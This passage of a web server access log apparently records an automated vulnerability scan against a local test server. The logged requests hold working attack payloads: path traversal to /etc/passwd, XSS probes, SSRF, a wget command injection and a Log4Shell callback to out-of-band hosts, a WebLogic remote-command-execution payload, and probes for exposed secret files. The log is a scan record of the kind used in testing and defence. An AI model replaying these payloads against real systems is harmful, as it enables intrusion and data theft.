/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x22297MdrTAn47zzQxxs1bSYt0Pvyn.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redash/reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%09/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"{\x0D\x0A \x22application_type\x22: \x22web\x22,\x0D\x0A \x22redirect_uris\x22: [\x22https://c9v8hs0smpv8c6ag07h0gyaam1n48an7x.oast.online/callback\x22],\x0D\x0A \x22client_name\x22: \x22127.0.0.1\x22,\x0D\x0A \x22logo_uri\x22: \x22https://c9v8hs0smpv8c6ag07h0eo3ame1yp4h3z.oast.online/favicon.ico\x22,\x0D\x0A \x22subject_type\x22: \x22pairwise\x22,\x0D\x0A \x22token_endpoint_auth_method\x22: \x22client_secret_basic\x22,\x0D\x0A \x22request_uris\x22: [\x22https://c9v8hs0smpv8c6ag07h0d91ykzhxkxpp6.oast.online\x22]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /connect/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/Home/uploadify/fileList?type=.+&path=../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.180","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28297MbN1mw5e1AHlO08MaeRDNJ7w%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin//phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.182","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/logo/logo-eoffice.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/agent/self HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/V1/products HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/components/com_joommyadmin/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?m=user&c=Users&a=logout&referurl=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.php?search=%22;wget+http%3A%2F%2Fc9v8hn0smpv8c57g0t00wcd9efnzj5wx8.oast.live%27;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.205","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache-default/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"j_username=${jndi:ldap://${hostName}.c9v8hn0smpv8c57g0t008w5bcd6pmi3d9.oast.live}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ftpsync.settings HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common_page/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /static/../../../a/../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ossim/session/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /register/?redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webalizer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) 